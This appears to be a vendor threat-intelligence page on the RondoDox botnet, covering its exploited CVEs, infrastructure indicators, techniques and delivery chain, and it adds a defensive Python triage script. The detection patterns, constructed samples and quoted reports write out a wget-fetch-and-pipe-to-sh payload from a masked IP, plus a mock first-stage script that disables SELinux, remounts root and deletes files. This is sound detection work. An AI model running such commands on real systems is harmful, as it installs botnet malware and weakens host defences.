RondoDox
RondoDox is a Linux-based botnet first identified in mid-2025 and commonly described as a Mirai variant or Mirai-like malware. Multiple reports characterize it as focused primarily on denial-of-service activity, with support for HTTP, UDP, and TCP DDoS attacks, while later reporting also states it evolved to drop and launch XMRig cryptocurrency mining payloads on infected systems. It primarily targets IoT devices, consumer edge devices, routers, DVRs, web servers, and other internet-exposed Linux systems, especially unsupported or end-of-life devices.
RondoDox has been observed using broad, multi-stage mass exploitation to compromise targets. Reporting attributes 174 exploited vulnerabilities to the botnet between May 25, 2025 and February 16, 2026, with peaks of up to 15,000 exploitation attempts per day and more than 40,000 automated attacks in one January 2026 campaign. It has been linked to exploitation of numerous flaws including CVE-2017-9841 (PHPUnit), CVE-2018-5999 (ASUS routers), CVE-2024-3721 (TBK DVRs), CVE-2023-1389, CVE-2025-37164, HPE OneView RCE, and React2Shell/CVE-2025-55182. Researchers reported active and persistent scanning for vulnerable Next.js servers, exploitation of TBK DVRs and Four-Faith routers, and campaigns against government, financial, and industrial systems.
The malware distribution chain described in reporting uses first-stage shell scripts named in the pattern rondo.XXX.sh and second-stage binaries named rondo for multiple CPU architectures. The first-stage script redirects output to /dev/null, kills suspicious or competing processes, attempts to disable SELinux and AppArmor, remounts the root filesystem read-write, deletes cache files, creates temporary marker files named .t in writable directories, removes prior malware files from locations such as /dev, /dev/shm, /run, /tmp, /var/run, and /var/tmp, then downloads and executes an architecture-specific binary using wget, curl, or busybox. The malware has been reported to support 18 architectures. Main binaries perform sanity, anti-debugging, and anti-analysis checks, establish persistence, remove competing malware, and connect to hard-coded command-and-control servers.
Infrastructure analysis indicates segmented exploitation, hosting, and C2 infrastructure. Bitsight identified 32 RondoDox-related IPs, split between exploitation and hosting nodes, and assessed that many hosting nodes were likely compromised residential systems. Reporting also linked Iranian-hosted infrastructure to RondoDox activity, including AbrArvan CDN-hosted exploitation infrastructure, and Hunt.io associated Iranian infrastructure with daily exploit volumes peaking at 15,000 attempts. Separate reporting noted use of compromised residential IPs and blacklisting logic on hosting servers to hinder analysis.
RondoDox has been associated in reporting with a recurring email indicator, bang2012@tutanota.de, embedded in observed first-stage shell scripts. Another report on ShellShock-linked distribution activity observed payloads fetching rondo.ame.sh from 74.194.191.52 and noted the marker rondo2012@atomicmail.io. Additional infrastructure indicators directly mentioned in the reporting include 37.32.15.8 as RondoDox exploitation infrastructure active since May 2025, and distribution IPs 83.252.42.112, 38.59.219.27, 192.183.232.142, and 74.194.191.52.
Overall, the reporting portrays RondoDox as a rapidly evolving, exploit-heavy IoT/Linux botnet that weaponizes a large set of known vulnerabilities to conscript exposed devices into a botnet used mainly for DoS operations, with later integration of XMRig mining functionality.
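Defender-side triage for the distribution chain and indicators described above, as an added example that is not code from any of the cited reports: it flags request lines that carry the reported rondo.XXX.sh fetch-and-pipe-to-sh pattern or one of the marker addresses, and scores a captured first-stage script against the behaviours listed. The regexes, the three-trait threshold and the sample lines are constructed assumptions, not vendor signatures.

```python
"""RondoDox first-stage triage helpers. Added example, not code from any report:
check_request() flags request/log lines carrying the reported delivery pattern
(a downloader fetching rondo.<tag>.sh, usually piped into sh) or a marker e-mail
address; check_script() scores a captured shell script against the first-stage
behaviours described in reporting. All sample data is constructed."""
import re

# Downloader plus script-name pattern: rondo.XXX.sh fetched by wget, curl or busybox.
FETCH_RE = re.compile(
    r"(?:wget|curl|busybox)\b[^|;&]*?\brondo\.[A-Za-z0-9]{1,4}\.sh\b", re.I)
PIPE_SH_RE = re.compile(r"\|\s*(?:ba)?sh\b")
# Marker addresses reported inside first-stage scripts and exploit User-Agents.
MARKERS = ("bang2012@tutanota.de", "rondo2012@atomicmail.io")

# First-stage script behaviours from the reporting, as (label, pattern).
SCRIPT_TRAITS = [
    ("silence_output", re.compile(r">\s*/dev/null\s*2>&1")),
    ("disable_mac", re.compile(r"\bsetenforce\s+0\b|apparmor", re.I)),
    ("remount_rw", re.compile(r"\bmount\s+-o\s+remount,rw\s+/")),
    ("marker_file", re.compile(r"/\.t\b")),  # '.t' marker in writable dirs
    ("cleanup_dirs", re.compile(
        r"\brm\s+-r?f\s+/(?:dev/shm|dev|run|tmp|var/run|var/tmp)/")),
]


def check_request(line: str) -> dict:
    """Return hit labels for one request line. Suspicious when the script fetch
    or a marker address is present; pipe-to-sh alone only corroborates."""
    hits = []
    if FETCH_RE.search(line):
        hits.append("rondo_script_fetch")
    if PIPE_SH_RE.search(line):
        hits.append("pipe_to_sh")
    lowered = line.lower()
    hits += ["marker:" + m for m in MARKERS if m in lowered]
    suspicious = any(h == "rondo_script_fetch" or h.startswith("marker:")
                     for h in hits)
    return {"suspicious": suspicious, "hits": hits}


def check_script(text: str, min_traits: int = 3) -> dict:
    """Score a captured shell script. Flag it when at least min_traits reported
    behaviours co-occur (hypothetical threshold) or a marker address is embedded."""
    traits = [label for label, rx in SCRIPT_TRAITS if rx.search(text)]
    lowered = text.lower()
    markers = [m for m in MARKERS if m in lowered]
    return {"suspicious": len(traits) >= min_traits or bool(markers),
            "traits": traits, "markers": markers}


# Constructed samples; the masked IP 74.###.###.52 mirrors the quoted report.
SAMPLE_REQUESTS = [
    'GET /cgi-bin/status HTTP/1.1" 200 "(wget -qO- http://74.###.###.52/rondo.ame.sh'
    ' || curl -s http://74.###.###.52/rondo.ame.sh) | sh"',
    'GET /index.php HTTP/1.1" 200 "Mozilla/5.0"',
    'POST /api/login HTTP/1.1" 405 "Mozilla/5.0 (rondo2012@atomicmail.io)"',
]
SAMPLE_SCRIPT = """#!/bin/sh
exec > /dev/null 2>&1
setenforce 0
mount -o remount,rw /
for d in /dev/shm /tmp /var/tmp; do touch $d/.t; done
rm -rf /tmp/rondo* /var/run/rondo*
# bang2012@tutanota.de
"""

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(check_request(line))
    print(check_script(SAMPLE_SCRIPT))
```

Feed real access-log or honeypot lines to check_request() and retrieved scripts to check_script(); the trait list is a starting point to extend as reporting on the family evolves.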
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
32 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2025-37164 (HPE OneView): "The campaign, attributed to the emerging RondoDox botnet, targets CVE-2025-37164, a critical remote code execution (RCE) flaw that allows unauthenticated attackers to seize control of the system. The vulnerability lies deep within the executeCommand REST API endpoint of HPE OneView’s “id-pools” functionality... The perpetrator behind this blitz is RondoDox, a Linux-based botnet first identified in mid-2025. Known for targeting IoT devices and web servers for DDoS attacks and cryptocurrency mining..."

CVE-2018-5999 (ASUS routers): "Cybercriminals are actively exploiting a critical software vulnerability from 2018, CVE-2018-5999, to target older models of ASUS routers. This unauthenticated configuration update vulnerability, with a CVSS score of 9.8/10, allows attackers to alter router settings without requiring a password. The RondoDox botnet has been exploiting this vulnerability since May 17, as discovered by VulnCheck's Canary Network. RondoDox, known for employing numerous exploits, primarily targets Linux-based systems for denial of service attacks."

The following 14 entries share one piece of supporting evidence: "This month, we are looking into a relatively new threat actor who is attempting to distribute the RondoDox malware... Since July 15th of this year, we’ve been seeing scans from what appears to be a specific threat actor attempting to distribute the recently discovered “rondo” malware... This malware is a variation on Mirai."

CVE-2023-1389 (TP-Link Archer AX21): A critical command injection vulnerability in the web management interface allows unauthenticated attackers to execute arbitrary commands as the root user.
CVE-2024-3721 (TBK DVRs): A critical command injection vulnerability in certain TBK DVR models allows an unauthenticated remote attacker to execute arbitrary commands via crafted HTTP requests.
CVE-2025-4008 (Meteobridge): A command injection vulnerability in the web interface allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges.
CVE-2022-40619 (FortiGate, FortiProxy, FortiSwitchManager): A firewall authentication bypass vulnerability allows an attacker to perform operations on the administrative interface.
CVE-2020-9054 (Zyxel NAS): A command injection vulnerability in the weblogin.cgi component of multiple Zyxel NAS products allows an unauthenticated remote attacker to execute arbitrary OS commands.
CVE-2025-34043 (Vacron NVR): A remote command injection vulnerability in Vacron Network Video Recorder (NVR) devices allows unauthenticated attackers to execute arbitrary commands on the operating system.
CVE-2023-41011 (China Mobile Intelligent Home Gateway v.HG6543C4): A command execution vulnerability in the shortcut_telnet.cg component allows a remote attacker to execute arbitrary code.
CVE-2022-36553 (Hytec Inter HWL-2511-SS): A command injection vulnerability in the popen.cgi component allows an authenticated attacker to execute arbitrary commands.
CVE-2014-3206 (Seagate BlackArmor NAS): Vulnerable to remote command execution via the session and auth_name parameters in certain web endpoints.
CVE-2023-23333 (SolarView Compact): A command injection vulnerability in downloader.php allows an unauthenticated remote attacker to execute arbitrary commands.
CVE-2025-9528 (Linksys E1700): A vulnerability in the router's systemCommand function allows an authenticated remote attacker to perform OS command injection.
CVE-2020-10987 (Tenda AC15 and AC1900): The setUsbUnload endpoint contains a command injection vulnerability that allows an unauthenticated remote attacker to execute arbitrary system commands.
CVE-2013-1599 (D-Link IP cameras): A command injection vulnerability in the rtpd.cgi component allows an unauthenticated remote attacker to execute arbitrary commands via a crafted query string.
CVE-2024-10914 (legacy D-Link NAS): An unauthenticated remote command injection vulnerability, particularly in the account_mgr.cgi script, allows an attacker to execute arbitrary shell commands.

CVE-2017-9841 (PHPUnit): "VulnCheck's exploit intelligence data shows CVE-2017-9841 has been leveraged by several botnets including RondoDox, Kinsing, KashmirBlack, Sysrv and Androxgh0st."

The next group of entries comes from a single report: "One threat that has been making noise recently due to its large repertoire of exploits is the RondoDox botnet. We initially observed this threat in May 2025... The main differentiator between RondoDox and Mirai is that, unlike Mirai, this malware’s sole purpose is to execute DoS attacks... At this point it will also set up its own persistence and drop and launch the XMRig miner."

The same report tabulates the lag between disclosure and adoption: "By looking at some recent CVEs from 2025 we created the following table, showing the time between the vulnerability being disclosed and when it was added by the operators."

CVE              Disclosed    Added by operators
CVE-2025-52089   2025-07-11   2025-10-19
CVE-2025-32756   2025-05-13   2025-10-18
CVE-2025-20281   2025-06-25   2025-10-18
CVE-2025-24016   2025-02-10   2025-08-22
CVE-2025-57296   2025-09-19   2025-10-19
CVE-2025-48827   2025-05-27   2025-11-03
CVE-2025-24893   2025-02-20   2025-11-03
CVE-2025-62593   2025-11-26   2025-11-24

CVE-2025-62593: "This was exploited before the CVE was published, and this is justified because the PoC for the vulnerability was available before the published date... For CVE-2025-62593 there’s a similar issue in the implemented exploit. The advisory mentions that the authentication to critical endpoints is made by checking the User-Agent string for “Mozilla”, which if present will return an HTTP code 405. The exploit used by RondoDox specifically sets the User-Agent to “Mozilla/5.0 (rondo2012@atomicmail[.]io)” which will render the exploit ineffective."

CVE-2025-47812 and CVE-2025-62593: "Other examples of issues with exploits are in CVE-2025-47812 and CVE-2025-62593. In the first CVE, if we read the description by RCE Security we can see that in order to fully trigger the exploit it requires 2 requests: an initial POST with the payload, followed by a POST to trigger the exploit. In our honeypots we only see the first POST and not the second."

CVE-2025-55182 (React2Shell) and CVE-2023-46604: "The most radical change in our observations is in early January 2026, where we went from around 40 observed vulnerabilities down to only two. One of these vulnerabilities is CVE-2025-55182, aka React2Shell, which was disclosed on December 3, 2025 and added by the threat actors on December 6, 2025." and "...One of these vulnerabilities is CVE-2023-46604."

CVE-2024-12856 (Four-Faith): "...and CVE-2024-12856, an operating system (OS) command injection bug affecting Four-Faith router models F3x24 and F3x36."

CVE-2014-6271 (Shellshock): CVE-2014-6271, commonly known as the Shellshock vulnerability, remains one of the most notorious flaws in Unix-based systems. This vulnerability affects the Bash shell and allows attackers to execute arbitrary commands by injecting malicious code into environment variables. Evidence: "Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance: 1 technique
Resource Development: 1 technique
Initial Access: 1 technique
  The vulnerability lies deep within the executeCommand REST API endpoint of HPE OneView’s “id-pools” functionality. According to the report, this endpoint “accepts attacker supplied input without authentication or authorization checks and executes it directly via the underlying operating system runtime”.
Execution: 4 techniques
  At this point it will also set up its own persistence and drop and launch the XMRig miner.
  By sending a single malicious request, they can bypass security checks entirely and run arbitrary code on the server.
Persistence: 3 techniques
Privilege Escalation: 3 techniques
Stealth: 7 techniques
  "RondoDox malware encodes its configuration data using a simple XOR obfuscation algorithm... decrypted using the hexadecimal key 0x21"
  "disguises malicious traffic by emulating popular games... as well as tools like Discord, OpenVPN, WireGuard"
  It then attempts to remove other threats, both by checking specific file locations and by removing entries from the victim's crontabs.
  "and clears the command execution history to evade detection"
  Upon being launched, the main binary does some basic sanity checks for its name and arguments, as well as checks for anti-debug and anti-analysis.
Defense Impairment: 1 technique
Discovery: 2 techniques
Command and Control: 3 techniques
Impact: 3 techniques
IOCs tracked for this family
104 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
73 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A botnet that exploits vulnerabilities in internet-facing devices, particularly Linux-based systems and older ASUS routers, to conduct denial-of-service attacks.
A Mirai-like botnet hosted on Iranian infrastructure that conducted large-scale exploitation attempts against internet-exposed devices.
Botnet activity hosted on Iranian infrastructure was linked to this malware.
Linux-focused botnet that mass-exploits exposed and often end-of-life IoT and consumer router devices, then deploys a payload that connects to command-and-control infrastructure. Its stated purpose in the content is to execute DoS attacks.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.